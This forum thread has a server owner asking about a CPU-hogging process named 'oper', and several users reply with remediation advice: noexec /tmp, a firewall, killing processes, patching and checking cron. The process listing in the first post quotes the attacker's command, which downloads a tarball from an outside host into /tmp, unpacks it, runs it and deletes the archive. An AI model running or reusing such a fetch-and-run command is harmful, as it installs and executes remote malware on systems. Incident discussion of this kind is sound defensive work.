I see a process caller "oper" using 98% of my CPU and running as nobody.
Here is the full process listing below. Through apache, someone has uploaded a script into /tmp and is running it. How comcerned do I need to be, and how did they get in? How can I prevent it? Any thoughts? Searching for oper.tar or anything results in not much....

nobody 4212 8059 0 Jun03 ? 00:00:00 sh -c cd /tmp;wget attilahack.100free.com/oper.tar;tar xvf oper.tar;./oper;rm -rf oper.tar
nobody 4218 4212 95 Jun03 ? 07:03:04 ./oper
nobody 4221 4218 0 Jun03 ? 00:00:00 [oper]

honestly, it looks like you were hacked.

They didnt get root... so their access is pretty limited. to fix this... remount your /tmp as non executable. You can find a how-to guide here on the forums, or open up a ticket, and ask the ev1 techs to remount your /tmp as non executable. Im sure if the right tech reads it, he will be more than willing to help. If you run into any problems, let me know, and I will walk you through it.

to get rid of any processes running by the attacker, simply reboot your server. That will clear out /tmp and kill his processes.


-James

to fix this
I would suggest using ssh to log in and then drop in and outbound traffic at the firewall except for your management IP (range). This will deny any new processes access. Then kill rogue processes which stops current traffic. Since they run as lesser-privileged user (and we do not expect to see more advanced methods) killing them as root should be easy: no reboot necessary. Stop or kill any non-vital internet-facing services like httpd and any non-vital interpreter (PHP, perl, whatever else) processes. You server got piggybacked because you run an unpatched version of a product people can interact with. To fix this upgrade whatever needs upgrading. Verify everything is as it should be, clean up, read up on and perform host hardening.

Just my two zloty.

i suggest a reboot regardless of whatever method you choose to secure your server, mainly because of the recent toys I have been seeing.

There was a file that could launch the process as another name. They were running it with the same name as the httpd daemon... id rather have the 2 minutes of downtime and be sure his processes are stopped than keep my uptime.

another important thing is to check in /var/spool/cron/nobody to see if the hacker didnt install a autoinstall/autoupdate/autorestart script

Is there a thread here or a write-up of that case? I'd be interested reading that.